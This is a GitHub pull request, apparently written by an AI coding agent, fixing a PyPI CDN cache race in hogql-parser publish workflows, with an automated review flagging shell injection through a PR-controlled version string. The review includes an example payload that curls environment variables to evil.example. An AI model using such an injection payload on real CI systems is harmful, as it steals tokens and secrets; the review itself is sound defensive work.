fix(ci): make hogql-parser publish robust to PyPI CDN cache lag#60643
Conversation
check-version reads `.info.version` from `pypi.org/pypi/<pkg>/json`, which Fastly caches with max-age=600. For up to ten minutes after an upload the cached JSON can still report the prior version. When the publish step's auto-pin commit retriggers the same workflow, the new run hits that stale cache, decides a republish is needed, and twine hard-fails with HTTP 400 on the duplicate upload because skip-existing is off. Latest hit: hogql-parser-rs 1.3.81 in PR #60226 (run 26630162284, job 78477339876). Switch the check to the per-version page (`pypi.org/pypi/<pkg>/<local>/json`), which is invalidated on upload and so 404/200 is authoritative; 404 means needs-release, 200 means already published, anything else logs a warning and falls back to needs-release. Belt-and-braces, also set skip-existing: true on the publish step so any future duplicate-upload code path is a no-op success instead of a hard failure. Applied identically to build-hogql-parser-rs.yml (Rust crate via maturin) and build-hogql-parser.yml (C++ wrapper via cibuildwheel), since they share the failure mode. build-hogql-parser-npm.yml is unchanged: it publishes to npm via npm publish and uses a separate PostHog/check-package-version action with its own version-detection mechanism, so the same PyPI-JSON-API race does not apply. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Drop the multi-line rationales that referenced the fix and the prior implementation; the remaining one-liner reads as standalone code. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
|
Reviews (1): Last reviewed commit: "chore(ci): trim hogql-parser workflow co..." | Re-trigger Greptile |
| if [[ -n "$existing" ]]; then | ||
| gh api "repos/${{ github.repository }}/issues/comments/$existing" -X PATCH -f body="$message_body" | ||
| # 200 = version already on PyPI, 404 = needs release. | ||
| http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json") |
There was a problem hiding this comment.
Shell injection via PR-controlled version string in curl URL
In build-hogql-parser-rs.yml, $local is extracted from rust/hogql/parser/pyproject.toml (a PR-controlled file) via grep | sed and then embedded directly inside a double-quoted shell string on line 54:
http_code=$(curl -o /dev/null -sSL -w '%{http_code}' "https://pypi.org/pypi/hogql-parser-rs/$local/json")If the version in pyproject.toml contains a ", the shell quoting breaks and the rest of the value executes as shell commands. For example, version = "1.0.0"$(curl -sf https://evil.example/x -d @/proc/self/environ)" makes $local = 1.0.0"$(...) and the shell expands the inner command substitution. The check-version job has no fork restriction (unlike build-wheels/publish), so any external contributor opening a fork PR against rust/hogql/parser/** can trigger this. The job has GH_TOKEN (GITHUB_TOKEN with pull-requests: write) set as an env var, which the injected command can exfiltrate. This is a regression: the old code used $local only in safe shell contexts (comparisons, string concatenation) — the URL construction is a new injection sink introduced by this PR. build-hogql-parser.yml line 51 has the identical pattern (though $local there already comes from python setup.py --version, itself PR-controlled code).
Prompt To Fix With AI
In both `.github/workflows/build-hogql-parser-rs.yml` and `.github/workflows/build-hogql-parser.yml`, add a version-format guard immediately after `$local` is assigned and before it is used in the curl URL. Valid PyPI/semver versions only contain alphanumeric characters, dots, hyphens, underscores, and `+`. Reject anything else:
```bash
# In build-hogql-parser-rs.yml, after line 50:
local=$(grep -m1 '^version = ' rust/hogql/parser/pyproject.toml | sed -E 's/version = "(.*)"/\1/')
if [[ ! "$local" =~ ^[0-9A-Za-z._+\-]+$ ]]; then
echo "::error::Invalid version string in pyproject.toml: '$local'"
exit 1
fi
```
Apply the same guard in `build-hogql-parser.yml` after `local=$(cd common/hogql_parser && python setup.py --version)`.
Alternatively, switch from double-quote interpolation to passing the URL as a separate argument that cannot be interpreted as shell metacharacters, but input validation is the more robust fix here since it also protects downstream uses of `$local`.Severity: medium | Confidence: 80%
Add a workflow: pattern to the changed-files step alongside parser:, and flip parser-release-needed=true when the YAML is the only thing that changed. skip-existing on the publish step keeps the duplicate upload a no-op, so a workflow edit exercises build + publish end-to- end and catches a broken edit at PR time instead of at the next real release. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Problem
The
Publish package to PyPIstep in.github/workflows/build-hogql-parser-rs.yml(and identicallybuild-hogql-parser.yml) can fail with a hard HTTP 400 on the first wheel even when that version is already on PyPI. The most recent occurrence:hogql-parser-rs1.3.81 in PR #60226 — see run 26630162284 / job 78477339876.The failure mode is a race against PyPI's JSON-API CDN cache, plus the workflow's own auto-pin retrigger:
check-versionrunscurl https://pypi.org/pypi/<pkg>/json | jq -r .info.version. That endpoint is served by Fastly withCache-Control: max-age=600, so for up to ten minutes after a successful upload the cached JSON can still report the previous version.Commit pinstep pushes atests-posthog[bot]commit (Use new hogql-parser-rs version) back to the PR branch. That push retriggers the same workflow, because GitHub'spull_requestpath filter evaluates the PR diff (not the latest commit's diff) and the PR overall still touchesrust/hogql/parser/**.published != local, setsparser-release-needed=true, build-wheels rebuilds, and the publish step's twine call gets a realHTTP 400 Bad Request from https://upload.pypi.org/legacy/because the file already exists.skip-existing: false(the default) turns that into a hard step failure.Quoted from the failing attempt-1 log:
The wheel itself was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04Z; the failing run is what auto-pin pushed and the cache race let through.
Changes
Applied identically to
build-hogql-parser-rs.yml(Rust crate via maturin) andbuild-hogql-parser.yml(C++ wrapper via cibuildwheel), since they share the failure mode.Per-version PyPI check. Replace
.info.versioncomparison with a per-version page lookup:Per-version pages have their own cache key and are invalidated on upload, so 404 vs 200 is authoritative within seconds of a successful publish (no CDN race). The unknown-status branch falls back to needs-release plus a
::warning::, so a transient PyPI 5xx doesn't silently skip an actual bump.skip-existing: trueon the publish step. Belt-and-braces with the check above. If anything else ever drives the publish step toward a duplicate upload (a retried attempt, a parallel run that lost a race), twine will print "Skipping ... already exists" and the step exits 0 instead of failing the whole pipeline.build-hogql-parser-npm.ymlis intentionally not changed: it publishes to the npm registry (no PyPI JSON cache involved) and uses a separatePostHog/check-package-versionaction with its own version-detection mechanism. If a similar race exists there it's worth a follow-up audit, but it's not the same bug as this one.How did you test this code?
I'm an agent and only did automated verification:
python3 -c "import yaml; yaml.safe_load(open(path))"on both modified files.bash -non everyrun:shell block in both workflows.pypi.org:pypi.org/pypi/hogql-parser-rs/1.3.81/json→ HTTP 200 (existing version)pypi.org/pypi/hogql-parser-rs/99.99.99/json→ HTTP 404 (missing version)pypi.org/pypi/no-such-pkg-i-promise-zzz/0.0.1/json→ HTTP 404 (so the "first ever publish" path correctly resolves to needs-release; this is what the deletedPyPI returns 404 until the first publishcomment was guarding against)The end-to-end behavior of the publish workflow against PyPI was not tested.
Automatic notifications
🤖 Agent context
Authored by Claude (Opus 4.7) in Claude Code, after investigation of the 1.3.81 publish failure.
Initial hypothesis was a sigstore/Rekor transient flake (the prior five bumps in the same PR succeeded, action issues #364/#376/#377 describe similar shapes). Pulling the actual attempt-1 log via the REST API (
gh run view --jobreturns the most recent attempt's log, not a specific attempt's, so the linked job ID neededruns/<id>/attempts/1/logsto get the right zip) and cross-referencing log timestamps against the per-fileupload_time_iso_8601frompypi.org/pypi/hogql-parser-rs/1.3.81/jsonshowed the wheel was uploaded by the prior, successful run 26629862904 at 09:41:54-09:42:04 UTC. The failing run only started its publish at 09:47:23 UTC, on the auto-pin commit pushed by the prior run, so the failure is a duplicate upload of an already-published version, not a sigstore flake.Considered and rejected:
pypa/gh-action-pypi-publishv1.14.0. Its changelog has no relevant fix (onlyverbose/print-hashdefault flips and dep bumps), and action issue Fix typing errors and add check #405 reports v1.14.0 regresses some callers.attestations: false. Attestations were not the failure mode (Fulcio cert + 7 Rekor transparency-log entries all succeeded before the upload).[skip ci]to the auto-pin commit message. Orthogonal to the PyPI cache race the fix targets, and after the check-version fix the retrigger does nothing useful anyway (check-version correctly resolves to false on the auto-pin commit). Worth a separate PR if we want to save the wasted runner cycle.